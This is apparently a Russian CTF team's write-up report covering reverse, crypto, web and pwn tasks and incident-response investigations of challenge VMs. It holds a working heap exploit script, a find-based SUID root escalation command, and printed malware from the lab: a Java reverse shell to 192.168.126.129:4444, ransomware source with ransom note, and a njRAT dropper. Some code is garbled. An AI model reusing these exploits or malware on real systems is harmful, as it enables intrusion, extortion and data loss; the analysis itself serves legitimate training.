Отчет Ромашек - Борозенец, Гришин, Кудрявцев, Шевченко

CTF

Reverse

Reverse 10 (writeup)

Заметим, что строка "this program cannot be run in dos mode" внутри банаря написана неправильно. Кода, проверяющего флаг, внутри бинаря не обнаруживаем. Проверим DOS STUB и запустим файл в dos box. Видим, что он начинает выводить флаг, но со временем вывод символов замедляется. Зайдем в 010 editor (hexeditor) и отрезаем все после dos stub. открываем в гидре и видим в коде два прерывания, гуглим дос-овские прерывания (одно выводит символ, другое делает sleep). в 010 editor патчим опкод прерывания "sleep" заменяем на 0x90 (nop). Запускаем и получаем флаг.

Reverse 20 (writeup)

Открываем в ida free, видим функцию, проверяющую флаг. Внутри нее так же много функцию, смотрим в них. В одной из них видим строчки с ошибками, гуглим и понимаем, что это код из библиотеки unicorn (предназначена для эмуляции различных архитектур). Смотрим на примеры из документации unicorn и переименовываем функции в псевдокоде исходя из аргументов. Поймем, что программа исполняет шеллкод для архитектуры mips32. копируем в шеллкод и вставляем его в какой-нибудь online disassembler (например https://disasm.pro/). Получим

```
and $t1, $t1, $a0
lui $s0, 0x2c24
subu $a0, $t1, $s0
sltu $v0, $zero, $a0
xori $v0, $v0, 1
add $v1, $v1, $v0
xor $t1, $t1, $t2
lui $s0, 0x7b4c
ori $s0, $s0, 0x1c77
subu $a0, $t1, $s0
sltu $v0, $zero, $a0
xori $v0, $v0, 1
add $v1, $v1, $v0
xor $t1, $t1, $t3
ori $s0, $s0, 0x7513
subu $a0, $t1, $s0
sltu $v0, $zero, $a0
xori $v0, $v0, 1
add $v1, $v1, $v0
and $t1, $t1, $t4
lui $s0, 0x4e50
ori $s0, $s0, 0x6011
sltu $v0, $zero, $a0
xori $v0, $v0, 1
xor $t1, $t1, $t5
ori $s0, $s0, 0x5142
subu $a0, $t1, $s0
xori $v0, $v0, 1
add $v1, $v1, $v0
xor $t1, $t1, $t6
lui $s0, 0x6242
subu $a0, $t1, $s0
sltu $v0, $zero, $a0
add $v1, $v1, $v0
and $t1, $t1, $t7
lui $s0, 0x2040
ori $s0, $s0, 0x6024
sltu $v0, $zero, $a0
xori $v0, $v0, 1
add $v1, $v1, $v0
xori $v0, $v0, 1
move $v0, $v1
addiu $s0, $zero,
subu $v0, $v0, $s0
sltu $v0, $zero, $v0
xori $v1, $v0, 1
```

Несложно догадаться, что тут каждые 4 байта флага сравниваются отдельно. Попытаемся по коду подобрать алгоритм дешифровки:

Действительно, вырисовывается что-то похожее: $nto\{Wh0_54id????s_1s_M3d???\}$. Оставшуюся часть подберем при помощи гугла по запросу "english word 6 letter med..." и тоже самое для первой скрытой части. Подгоним флаг под организаторов при помощи X4k3pck0r0 стиля написания: $nto\{Wh0_54id_th1s_1s_M3d1um\}$

Crypto

Crypto 10 (writeup)

Развернем афинные преобразования в другую сторону и получим флаг:

```
^[[A^[from sage.all import *
....: class DihedralCrypto:
          def __init__(self, order: int) -> None:
    self.__G = DihedralGroup(order)
. . . . :
               self.__order = order
....:
               self._gen = self._G.gens()[0]
self._list = self._G.list()
self._padder = 31337
. . . . :
...:
. . . . :
                 _pow(self, element, exponent: int):
. . . . :
               try:
. . . . :
                    element = self. G(element)
. . . . :
                except:
. . . . :
                    raise Exception("Not Dihedral rotation element")
. . . . :
               answer = self. G(())
. . . . :
                aggregator = element
. . . . :
               for bit in bin(int(exponent))[2:][::-1]:
    if bit == '1':
. . . . :
. . . . :
                    answer *= aggregator
aggregator *= aggregator
. . . . :
. . . . :
               return answer
. . . . :
. . . . :
                __byte_to_dihedral(self, byte: int):
return self.__pow(self.__gen, byte * self.__padder)
. . . . :
. . . . :
. . . . :
...:
                 _map(self, element):
                return self.__list.index(element)
. . . . :
. . . . :
...:
                 _unmap(self, index):
. . . . :
                return self.__list[index]
. . . . :
...:
           def f(self,byte):
               return self. map(self. byte to dihedral(byte))
. . . . :
           def hash(self, msg):
. . . . :
               answer = [] for byte in msg:
. . . . :
. . . . :
                    answer.append(self.__map(self.__byte_to_dihedral(byte)))
. . . . :
               return answer
dihedral = DihedralCrypto(1337)
^[[A^[for i in range(32,127):
          dct[dihedral.f(i)] = i
^{[A^{for i in c:}]}
          print(chr(dct[i]),end='')
```

Crypto 20 (writeup)

Рассмотрим функцию guess_bit, выдающую і-тый бит флага:

```
n = 105495798419138903695164559595879770107477942928145788157387677316958673004417074884340867780589038831220812131593040184756518773272611391629285575
@app.route('/guess_bit', methods=['GET'])
def guess_bit():
    args = request.args
    if 'bit' not in args.keys():
        return ("error": "Bit needed to be guessed")
    index = abs(int(args['bit']))
    if index >= len(flag):
        return ("error": "Index overflow")
    bit = flag[index]
    if bit == '1':
        return {"guess": pow(7, getPrime(300), n)}
    else:
        return {"guess": randint(n//2, n)}
```

Если bit=1, то "guess" содержит любое натуральное число меньшее п. Если же бит занулен, то "guess" лежит в промежутке [n//2,n]. Давайте ~ 10 раз запросим "guess", если хоть раз вернется число в диапазоне [n//2,n], то бит однозначно ноль,иначе (с высокой вероятностью) он 1. Таким образом, мы можем с высокой вероятностью определить значение бита. Так дампим все биты и получаем флаг

Crypto 30 (writeup)

получим большое кол-во простых чисел (ps) и шифрованных флагов (fs). Например, 450. Используем вариацию атаки полига хеллмана и КТО:

Web 10 (writeup)

Конкретные payload/ы не были сохранены, поскольку изначально было сказано, что task-based задания расписывать нет нужды. Однако я могу пояснить логику решения.

- 1. Разведка При подключении на сайт видим одностраничник. Ничего полезного нет (была проведен базовый поиск полезных файлов), кроме одного скрипта (script.js), который содержит логику приложения.
- 2. Анализ работы приложения На самом деле приложение само по себе тривиально: нас встречает большая форма данных, которая по умолчанию передается как json (что важно). При анализе способа передачи данных (а передавались они через веб-сокеты), обнаружилось, что как запрос к серверу, так и его ответ шифруются и дешифруются функциями епстурт и decrypt соответственно. Они и были использованы мной и моим сокомандником, чтобы отправлять сервису новосозданные запросы.
- 3. Эксплуатация Выше было сказано, что данные по умолчанию отправлялись в виде json. За это отвечало отдельное поле в запросе. Так как нашей задачей было достать флаг из файла, я предположил, что тип парсинга данных можно поменять на xml (чтобы провести атаку xxe). И это сработало: был построен пейлоад в виде xml, который содержал в себе все обязательные поля; он успешно был обработан сервисом. Так, дело оставалось за малым эксплуатируем xxe ([]> и &xxe в обязательном поле) и сдаем решение.

Web 20 (writeup)

Задание было посвящено теме http smuggling. Но решение его оказалось более простым, из-за багов в сервисе.

Обратимся к коду:

```
def make_request(username):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("service2", 3001))
    sock.settimeout(1)

payload = f"""GET / HTTP/1.1\r\nHost: 0.0.0.0:3001\r\nCookie: username={username};flag={FLAG}\r\n\r\n"""
    sock.send(payload.encode())
    time.sleep(.3)

try:
    data = sock.recv(4096)
    body = data.split(b"\r\n\r\n", 1)[1].decode()
    except (IndexError, TimeoutError) as e:
        print(e)
        body = str(e)
    return body
```

Заметно, что payload можно составить таким образом, чтобы было послано 2 запроса (2 - на наш сервер с кукой флага). Однако, если сделать пользователя, username которого содержит последовательность "\r\n", то при входе на путь / мы увидим сообщение-ошибку об "\r\n", в которой в чистом виде лежит флаг.

PWN

Pwn 30 (writeup) from pwn import *

```
from sys import argv
#p = process(['./ld-2.31.so', '--library-path', '.' , './diary'])
p = remote('10.10.14.10', 2228)
elf = ELF('./libc.so.6')
#gdb.attach(p)
def cmd(n):
         p.recvuntil('choice: ')
         p.sendline(str(n))
def add mark(mark, size, comment):
         cmd(1)
         for i in [mark, size, comment]:
    p.recvuntil(': ')
    if (type(i) is int):
                            i = str(i)
                  p.sendline(i)
def view mark(index, endSymbol='\n'):
         cmd(3)
         p.recvuntil('index: ')
         p.sendline(str(index))
         return p.recvuntil (endSymbol)
def delete mark(index):
         cmd (4)
         p.recvuntil('index: ')
         p.sendline(str(index))
def edit mark(index, mark, size, comment):
         cmd(2)
         for i in [index, mark, size, comment]:
                  p.recvuntil(': ')
                  if (type(i) is int):
    i = str(i)
                  p.sendline(i)
for i in range(9):
         add_mark(1, 256, 'a'*31)
for i in range(9):
         delete mark(i) # заполняем tcache, последний чанк попадёт в unsorted bin
chunk addr lodword = view mark(1, 'Add').split(b' ')[1].split(b'Comment')[0]
chunk addr lodword = int (chunk addr lodword.decode()) # сливаем последние четыре байта адреса чанка
for i in range(9):
         add_mark(1, 256, 'a'*31) # опустошаем tcache
leak = u64(view_mark(8,b'\x7f')[-6:]+b'\x00'*2) # сливаем адрес libc
libc = leak - 0x1eabe0
free_hook = elf.symbols['__free_hook']+libc
system = elf.symbols['system']+libc
print ('Libc:', hex(libc))
```

```
print ('Free hook:', hex(free_hook))
#for i in range(10):
        add mark(50, 40, 'e'*24)
#for i in range(7):
        delete_mark(18+i)
#delete_mark(27)
#delete_mark(25)
#delete mark(27)
for i in range(7)
        edit mark(9+i, 50, 40, 'e'*24) # выделяем чанки, чтобы потом опустошив их заполнить tcache
for i in range(3):
        add_mark(50, 40, 'c'*24)
for i in range (7):
        delete_mark(9+i) # заполняем tcache
delete_mark(19) # этот чанк попадёт в fastbin
delete_mark(18) # этот чанк опустошаем, чтобы libc не выдала ошибку
delete_mark(19) # теперь один и тот же чанк опустошён дважды, значит мы можем писать по произвольному адресу
# но при этом дважды опустошается ещё и чанк, который хранит оценку и
# комментарий к ней, поэтому ранее мы и слили последние 4 байта адреса чанка
# , чтобы у нас был валидный адрес
for i in range(7):
        add_mark(50, 40, 'c'*24)
^{\circ} ^^^ опустошаем tcache, после чего libc переместит чанки из
fastbin в tcache из-за чего мы сможем избежать неудобных проверок'''
add_mark(chunk_addr_lodword, 40, p64(free_hook)) # подделываем указатель на следующий чанк в бине на __free_hook
add_mark(chunk_addr_lodword, 40, b'cat *') # __free_hook на вход получает адрес чанка, а он указывает на эту строку. /bin/bash почему-то крашится, поэт add_mark(chunk_addr_lodword, 40, b'ls;ls;ls;ls;ls;)
add_mark(chunk_addr_lodword, 40, p64(system)) # переписываем __free_hook на system
#add mark(chunk addr lodword, 40, p64(system))
delete mark(18)
p.interactive()
```

Задание 1

```
Выдан образ машины linux(vmdk)
+ Import vmdk to virtualbox
+ Reset Sergey/Root password via grub mode
+ Login with sergey(root)
```

Как злоумышленник попал на машину

(/home/sergey/minecraft.jar)

package Malware;

В истории к заданию сказано, что Валера запустил майнкрафт на компьютере. Найдем одноименный файл и разреверсим его. При помощи jadx декомпилируем класс Malware

```
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
/* loaded from: minecraft.jar:Malware/ReverseShell.class */
public class ReverseShell
    public static void main(String[] args) {
         try
              {\tt Process\ p\ =\ new\ ProcessBuilder("/usr/bin/bash").redirectErrorStream(true).start();}
              Socket s = new Socket("192.168.126.129", 4444);
              InputStream pi = p.getInputStream();
InputStream pe = p.getErrorStream();
InputStream si = s.getInputStream();
             OutputStream po = p.getOutputStream();
OutputStream so = s.getOutputStream();
              while (!s.isClosed()) {
                  while (pi.available() > 0) {
                       so.write(pi.read());
                  while (pe.available() > 0) {
                      so.write(pe.read());
                  while (si.available() > 0) {
                      po.write(si.read());
                  so.flush();
                  po.flush();
                   try {
                       Thread.sleep(50L);
                   } catch (InterruptedException e) {
                       e.printStackTrace();
                       p.exitValue();
                       break;
                   } catch (Exception e2) {
             p.destroy();
              s.close();
         } catch (IOException e3) {
             e3.printStackTrace();
    }
```

Видно, что впо создает реверс шелл(который обращается к 192.168.126.129:4444).

Как повысил свои права?

От рута проанализируем /root/.bash_history file. Видимо подозрительный файл /usr/bin/find

```
ls -lah /usr/bin/find
-> -rwsr-sr-x 1 root root 276K Mar 23 2022 /usr/bin/find
```

Видим, что файл имеет suid флаг, что позволяет поднять привелегии. Файл редактировался 23 марта 2022 года, что позволяет сделать вывод о том, что файл не бекдор от злоумышленника. Повышение привелегий до рута:

```
sudo install -m =xs $(which find)
./find . -exec /bin/sh -p \; -quit
## root access
```

Как злоумышленник узнал пароль от passwords.kdbx?

Продолжая анализировать history, видим, что на компьютере использовалась программа logkeys.

(выдержка)

cat cat Makefile

```
cat build//config.log
ls build
ls -la u
sh linpeas.sh
ping 192.168.126.129
reboot
ifconfig
base64 minecraft.jar
exit
./logkeys -m en_US_ubuntu_1204.map -s
./logkeys --us-keymap en_US_ubuntu_1204.map -s
./logkeys
./logkeys -s -u en_US_ubuntu_1204.map
cd src/
./logkevs -s
cd Downloads/build/src/
lsusb
ls /home/
rm -rf /home/ubuntu/
userdel -r ubuntu
keepass2
sudo apt-get install keepass2
./logkeys -k
```

При помощи поиска в интернете, понимаем, что это кей логгер, позволяющий злоумышленнику узнать пароль от keepass.

B папке /var/log видим одноименный файл /var/log/logkeys.log - log file B нем указан пароль - 1_DON7_NOW_WHY_NO7_M4Y83_345Y

Куда logkeys пишет логи?

На данной машине линукс был найден репозиторий с исходным кодом logkeys. Анализируя историю(/root/.bash_history) запуска команд на машине, видим, что logkeys запускался без аргументов. Это допустимо, поскольку путь log файла является опциональным аргументом (args.logfile = optarg; /src/args.cc). Если аргумент не был задан, то используется DEFAULT_LOG_FILE (/src/logkeys.cc) равный "/var/log/logkeys.log".

Действительно, после проверки пути /var/log, был найден данный файл с информацией о нажатых клавишах, что подтверждает тезис.

Пароль от чего лежит в passwords.kdbx?

Проанализировав логи кейлогера, понимаем, что были захвачен и пароль от хранилища паролей (keepass) 2023-02-10 07:56:02-0500 > 1_DON7_NO<#+32>W_WHY_NO7_M4Y83_345Y почитав документацию, понимаем, что шифт был нажат 32 раза -> итоговый пароль 1_DON7_NOW_WHY_NO7_M4Y83_345Y логинимся, забираем логин пароль от рдп виндовс машины итого: 5 windows_rdp Administrator SecretP@ssOrdMayby_OrNot

Задание 2

internal class Config

```
+ Получаем машину (vmdk)
```

+ Логинимся Administrator:SecretP@ss0rdMayby_0rNot

Какой пароль от Ransomware?

пароль: 084b988baa7c8d98cda90c5fe603c560 На предыдущей машине был найден интересный исполняемый файл(VTropia.exe), который детектился virustotal как впо. Заметим, что это бинарь на дотнете.

```
$ file VTropia.exe
Vropia.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
```

= Utils.DecodeBase64(Utils.Xor(Utils.DecodeBase64(IP), Key));

используем для декомпиляции https://github.com/icsharpcode/AvaloniaILSpy

```
public static string IP = "NiA3XjonOFogOlYaPBAhXT8eJhwxHVoaNlpZBTQFI10VXi8/DS01NDEQOhU=";

public static string User = "AwQ3JBU5IxY2GyZQ";

public static string Message = "AlojBRAnJxolCyEFABsYCjwnOlwaMykDNisrRjVbMxcQKC8cDgQ5FywPBwUBJDkLChk5HDYBKx81BSsXPDc3XDYUPgUmLx8uARE9CwkzVgUeWzgUDlst

public static string Key = "V2hlbllvdWxsQ29tZUhvbWU=";

public static string AES { get; set; }

public static void Decrypt(string key)
{
    Key = Utils.DecodeBase64(Key) + Utils.DecodeBase64(key);
```

```
User = Utils.DecodeBase64(Utils.Xor(Utils.DecodeBase64(User), Key));
              Message = Utils.DecodeBase64(Utils.Xor(Utils.DecodeBase64(Message), Key));
internal class Crypt
       public static void Process(string password)
               password = Utils.CalculateKey();
               factor of the string[] logicalDrives = Directory.GetLogicalDrives();
for (int i = 0; i < logicalDrives.Length; i++)</pre>
                      EncryptDirectory(logicalDrives[i], password);
       public static void EncryptDirectory(string location, string password)
               try
                            ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", "jpeg", ".png",
    ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd",
    ".sql", ".mp4", ".7z", ".rar", ".m4a", ".wma", ".avi", ".wmv", ".csv", ".d3dbsp",
    ".zip", ".sie", ".sum", ".ibank", ".tl2", ".qdf", ".gdb", ".tax", ".pkpass",
    ".bc6", ".bc7", ".bkp", ".qic", ".bkf", ".sidn", ".sidd", ".mddatat, ".itl", ".itdb",
    ".icxs", ".hvpl", ".hplg", ".hkdb", ".mdbackup", ".syncdb", ".gho", ".cas", ".svg", ".map",
    ".wmo", ".itm", ".sb", ".fos", ".mov", ".vdf", ".ztmp", ".sis", ".sid", ".ncf",
    ".menu", ".layout", ".dmp", ".blob", ".esm", ".vcf", ".vtf", ".dazip", ".fpk", ".mlx",
    ".kf", ".iwd", ".ypk", ".tor", ".psk", ".rim", ".w3x", ".fsh", ".ntl", ".arch00",
    ".lvl", ".snx", ".cfr", ".ff", ".vpp_pc", ".lrf", ".m2", ".mcmeta", ".vf50", ".mpqge",
    ".kdb", ".db0", ".dba", ".rofl", ".hkx", ".bar", ".upk", ".das", ".iwi", ".litemod",
    ".asset", ".forge", ".ltx", ".bsa", ".apk", ".re4", ".sav", ".lbf", ".slm", ".bik",
    ".epk", ".rgs3a", ".pak", ".big", "wallet", ".wotreplay", ".xxx", ".desc", ".py", ".m3u",
    ".flv", ".js", ".css", ".rb", ".p7c", ".pk7", ".p7b", ".p12", ".pfx", ".pem",
    ".crt", ".cer", ".der", ".x3f", ".srw", ".pef", ".ptx", ".r3d", ".rw2", ".rw1",
    ".raw", ".raf", ".orf", ".nrw", ".mrwref", ".mef", ".cf", ".kdc", ".dcr", ".cr2",
    ".crw", ".bay", ".sr2", ".srf", ".arw", ".3fr", ".dng", ".jpe", ".jpg", ".cdr",
    ".indd", ".ai", ".eps", ".pdf", ".adcb", ".mdb", ".pptm", ".pptx", ".ppt", ".xlk",
    ".xlsh", ".xlsm", ".xlsx", ".acdb", ".mdb", ".pptm", ".pptx", ".pot", ".odb", ".odc",
    ".odm", ".odp", ".ods", ".odt", ".ico"
                      string[] source = new string[205]
                      string[] files = Directory.GetFiles(location);
                      string[] directories = Directory.GetDirectories(location);
                      for (int i = 0; i < files.Length; i++)
                              string extension = Path.GetExtension(files[i]);
                              if (source.Contains(extension))
                                     EncryptFile(files[i], password);
                      for (int j = 0; j < directories.Length; j++)
                              if (!directories[j].Contains("Windows") && !directories[j].Contains("Program Files") && !directories[j].Contains("Program Files (x86)")
                                     EncryptDirectory(directories[i], password);
              catch
       public static void EncryptFile(string file, string password)
              byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
              byte[] bytes = Encoding.UTF8.GetBytes(password);
               bytes = SHA256.Create().ComputeHash(bytes);
              byte[] bytes2 = AES_Encrypt(bytesToBeEncrypted, bytes);
              try
                      File.WriteAllBytes(file, bytes2);
string text = ".p4blm";
                      File.Move(file, file + text);
               catch (UnauthorizedAccessException)
       }
       public static byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
              byte[] array = null;
              byte[] salt = new byte[8] { 1, 8, 3, 6, 2, 4, 9, 7 };
              using MemoryStream memoryStream = new MemoryStream();
              using RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.KeySize = 256;
               rijndaelManaged.BlockSize = 128;
              Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
              rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
rijndaelManaged.Mode = CipherMode.CBC;
               using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
                      cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                      cryptoStream.Close();
               return memoryStream.ToArray();
       }
internal class Program
       private static void Main(string[] args)
              Execute();
```

```
private static void Execute()
        if (Utils.CheckUser())
             Environment.Exit(0);
        Thread.Sleep(5000);
        Config.Decrypt("SWxsU3RvcFRoaXM=");
        Crypt.Process(Config.AES);
        Utils.LeaveMessage();
        Utils.Annihilate();
internal class Utils
    public static string CalculateKey()
        try
             return MD5("HelloWin" + Config.User);
        catch
             return "d7d129356554062f0311ee22d59ea9eb";
    public static void LeaveMessage()
        File.WriteAllText("C:\\Users\\" + Environment.UserName + "\\Desktop\\info.txt", Config.Message);
    public static bool CheckUser()
             if (Environment.UserName != "Administrator")
                 return true;
             return false;
        catch
             return false;
    public static void Annihilate()
        Process.Start(new ProcessStartInfo
             Arguments = "/C timeout 2 && Del /Q /F " + Application.get ExecutablePath(),
             WindowStyle = ProcessWindowStyle.Hidden,
             CreateNoWindow = true,
             FileName = "cmd.exe"
        });
    }
    public static string DecodeBase64(string data)
             if (string.IsNullOrEmpty(data))
                 return null;
             return Encoding.UTF8.GetString(Convert.FromBase64String(data));
        catch
             return null;
    public static string Xor(string data, string key)
        try
             if (string.IsNullOrEmpty(data))
                 return null;
             StringBuilder stringBuilder = new StringBuilder();
             for (int i = 0; i < data.Length; i++)
                 int utf = data[i] ^ key[i % key.Length];
stringBuilder.AppendFormat("{0}", char.ConvertFromUtf32(utf));
             return stringBuilder.ToString();
        catch
             return null;
    public static string MD5(string data)
             byte[] bytes = Encoding.UTF8.GetBytes(data);
            bytes = ((HashAlgorithm)CryptoConfig.CreateFromName("MD5")).ComputeHash(bytes);
return BitConverter.ToString(bytes).Replace("-", string.Empty).ToLower();
             return null;
```

```
Key = Utils.DecodeBase64(Key) + Utils.DecodeBase64(key);
IP = Utils.DecodeBase64(Utils.Xor(Utils.DecodeBase64(IP), Key));
    User = Utils.DecodeBase64(Utils.Xor(Utils.DecodeBase64(User), Key));
    Message = Utils.DecodeBase64(Utils.Xor(Utils.DecodeBase64(Message), Key));
Получим
Key = WhenYoullComeHomeIllStopThis
IP = https://pastebin.com/raw/VRjvXMu1
User = NTI-User
Message
Sad to say, but all your files have been encrypted!
But don't cry, there's the way to recover them - pay 500$ in BTC to this wallet:
3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
You have 24 hours. After them your files will stay unaccessible for next eternity.
Рассмотрим работу данного вредоноса. Вот его алгоритм:
   1. Process запускает EncryptDirectory, запускающий EncryptFile с паролем из CalculateKey. ("084b988baa7c8d98cda90c5fe603c560")
   2. EncryptFile - берет sha256 от пароля и вызывает AES_Encrypt(data_to_be_encrypted, key) т.е. шифрует файл при помощи AES_Encrypt
   3. AES_Encrypt - какой-то кастомный aes cbc. вытащим ключ и iv:
      using System;
      using System. Security. Cryptography;
      using System.Security;
      using System.Text;
      class HelloWorld
      static void Main()
           byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes("084b988baa7c8d98cda90c5fe603c560"));
           byte[] array = null;
           byte[] salt = new byte[8] { 1, 8, 3, 6, 2, 4, 9, 7 };
           RijndaelManaged rijndaelManaged = new RijndaelManaged();
           riindaelManaged.KevSize = 256;
           rijndaelManaged.BlockSize = 128;
           Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
           rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
           Console.WriteLine(Convert.ToBase64String(rijndaelManaged.Key));// T+4g/6PSPe3bkJsNSbW7pdpcBzgzXoYVyG3ks4sBZtQ=
           Console.WriteLine(Convert.ToBase64String(rijndaelManaged.IV)); //sx1emNG67pfLpNCg0B4bUw=
Напишем декриптор который потребуется в дальнейших шагах:
from base64 import b64decode as b
from Crypto.Cipher import AES
key = b('T+4g/6PSPe3bkJsNSbW7pdpcBzgzXoYVyG3ks4sBZtQ=')
iv = b('sx1emNG67pfLpNCq0B4bUw=='
files = ['./Important.txt.txt.p4blm',]
for fname in files:
    aes = AES.new(key,iv=iv,mode=AES.MODE CBC)
    c = open(fname,'rb').read()
    plain = aes.decrypt(c)
    open(fname.replace('.p4blm',''),'wb').write(plain)
    print (plain)
Запустим на Important.txt.txt.p4blm и получим CSh4RpR@n50mWar3z4ReSti11Us3fUl.
Какие процессы в системе являются вредоносными?
doom.exe(сам он не вредонос, только дроппер) и порождаемые им процессы C:/Users/Administrator/AppData/Dropped/1.exe и тп. (выше в коде показано)
Вредоносные процессы на машине
C:\ProgramData\Windows Explorer.exe
C:\Users\Administrator\AppData\Local\Temp\Runtime Broker.exe
C:\Users\Administrator\AppData\Roaming\Host Process for Windows Tasks.exe
   \Users\Administrator\Security Health Service.exe
C:\Windows\Antimalware Service Executable.exe
Доказательства: При реверс-инженеринге впо обнаруживаем:
static Njrat() {
Njrat.EXE = "Antimalware Service Executable.exe; // njrat переименовывается в дальнейшем в этот файл
if (File.Exists(Interaction.Environ(Njrat.DR) + "\" + Njrat.EXE)) {
File.Delete(Interaction.Environ(Njrat.DR) + "\" + Njrat.EXE);
File.Copy(Njrat.LO.FullName, Interaction.Environ(Njrat.DR) + "\" + Njrat.EXE, true);
```

Мы видим, что впо проверяет наличие файла, затем удаляет его, после копирует себя на место удаленного файла и запускается. pid:5168 pid:5176

Как произошла доставка вредоносного ПО?

Process.Start(Interactoin.Environ(Njrat.DR) + "\" + Njrat.EXE);

Давайте исполним следующую функцию Config.Decrypt("SWxsU3RvcFRoaXM=");:

public static void Decrypt (string key)

найдем на рабочем столе пользователья Administrator странный файл Doom. exe. Открываем в Ilspy и понимаем, что эта программа - дроппер:

```
internal class Program
{
    private static void Main(string[] args)
    {
```

```
 \text{if (!Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\\Dropped"))} \\
    Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Dropped");
string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Dropped\\";
File.WriteAllBytes(text + "1.exe", DoomResources._1); File.WriteAllBytes(text + "2.exe", DoomResources._2);
File.WriteAllBytes(text + "3.exe", DoomResources._3);
File.WriteAllBytes(text + "4.exe", DoomResources._4);
File.WriteAllBytes(text + "5.exe", DoomResources. 5);
Process.Start(text + "1.exe");
Process.Start(text + "2.exe");
Process.Start(text + "3.exe");
Process.Start(text + "4.exe");
Process.Start(text + "5.exe");
Thread.Sleep(60000);
File.Delete(text +
File.Delete(text + "2.exe");
File.Delete(text + "3.exe");
File.Delete(text + "4.exe");
File.Delete(text + "5.exe");
```

т.е. он закидывает файлы в Appdata/Dropped , а потом их удаляет. Заходим в ресурсы doom.exeu экспортируем экзешники, которые он создает. Понимаем, что это njrat по строкам, хешам, репорту с вирустотала.

Итого, доставка впо: запуск doom.exe => дроп их на диск и запуск

Какие средства обфускации были использованы?

закинем один из дропнутых екзешников в декомпиль и немного побродив по _1.ехе найдем следующее:

```
internal class MK4PqaDfHZTyUZ6JDo
{
    private static bool nf6dcw9mvT;
    internal static void NetReactor()
    {
        if (!nf6dcw9mvT)
        {
            nf6dcw9mvT = true;
            if (Math.Abs((DateTime.Now - new DateTime(2023, 3, 15)).Days) >= 14)
            {
                 throw new Exception("This assembly is protected by an unregistered version of Eziriz's \".NET Reactor\"! This assembly won't further woney
            }
        }
    }
}
```

строчка "This assembly is protected by an unregistered version of Eziriz's ".NET Reactor"! This assembly won't further work" явно указывает на обфускацию .NET Reactor.

Как злоумышленник нашел учетные данные от Web-сервиса?

Изучив все зашифрованные файлы на машине с расширением "p4blm", находим в папке AppData/Local/Google/Chrome/User data/Default зашифрованный "Login Data". Данный файл обычно содержит информацию о сохраненной связке "пароль:логин" для сайтов. Восстановив файл и подгрузив его в chrome, посмотрим сохраненные пароли.

В нем содержится строка "admin:P@ssw0rd" для сайта "10.10.137.110", который ранее был замечен в истории браузера. То есть злоумышленник нашел пароль от вебсервиса в 'сохраненных паролях' chrome, а потом использовал криптор

Задание 3

(Нужно найти уязвимости и исправить их) Выдано: sss administrator@10.10.14.110

```
password: by4%ov8%&YN5

1. service/emulator/src

def map_action(cl, action):
    for act in action.split('.'):
        cl = getattr(cl, act)
    return cl

patch: заведем whitelist для действий, которые есть в системе, чтобы не допустить вызов произвольных методов (например, __del_attr__):

wl = ['get_type', 'add_element', 'set_sensitivity', 'get_sensitivity', 'enable', 'disable', 'get_enabled', 'get_type', 'add_element', 'get_image', 'enaldef map_action(cl, action):
    for act in action.split('.'):
        if action in wl:
```

РОС в контейнере эмулятора:

else:

return cl

import pymongo

```
import requests
requests.post('http://127.0.0.1:8888/execute',json={"element":"Elevator","action":"__hash__","args":[]}).text
# '{"result":8747703940928,"status":"ok"}\n'
```

2. Пофиксили множетсвенные уязвимости в сервисе (nosqli)

```
import bcrypt
import time
import json
import base64
import os

class DB:
    def __init__(self, connection_string):
        self.c_string = connection_string
```

cl = getattr(cl, act)

cl = 'POSHEL VON'

```
self.__connect()
self.salt = b'$2b$12$THzbTRP4fVwlM1SitlNKSu'
    if self.users.count_documents({}) != self.permissions.count_documents({}):
    self.client.drop_database('xss')
      connect(self):
def
    __onnection:
self.client = pymongo.MongoClient(self.c_string)
self.db = self.client['xss']
self.users = self.db['users']
    def
      _check_connection(self):
        self.users.find({})
    except Exception:
         self.__connect()
def new_user(self, username, email, password, is_admin):
    self.__check_connection()
hashed = self.hash_password(password)
    try:
        next_uid = self.users.find_one(sort=[('uid', pymongo.DESCENDING)])['uid'] + 1
    except Exception as e:
        next_uid = 1
    self.users.insert_one({"username":username, "email":email, "password":hashed, "admin": is_admin, "uid": next_uid})
    return True
def set_admin(self, username, is_admin):
    self.__check_connection()
    # PATCH 11
    #r = self.users.update_one(("$where": f"this.username == '{username}'"}, {"$set": {"admin": is_admin}})
    r = self.users.update({
         'username': {
              '$eq': username
    }, {"$set": {"admin": is admin}})
    if r.modified count == 0:
         return False
    return True
def hash_password(self, password):
    return bcrypt.hashpw(password.encode(), self.salt).decode()
def check_user(self, username, password):
    self.__check_connection()
hashed = self.hash_password(password)
         # PATCH 10
         #u = self.users.find({"$where": f"this.username == '{username}' && this.password == '{hashed}'"})[0]
         u = self.users.find({
              '$and': [
                 {'username': {
                      '$eq': username
                  {'password': {
                      '$eq': hashed
                  } }
         })[0]
        return u['uid']
    except IndexError as e:
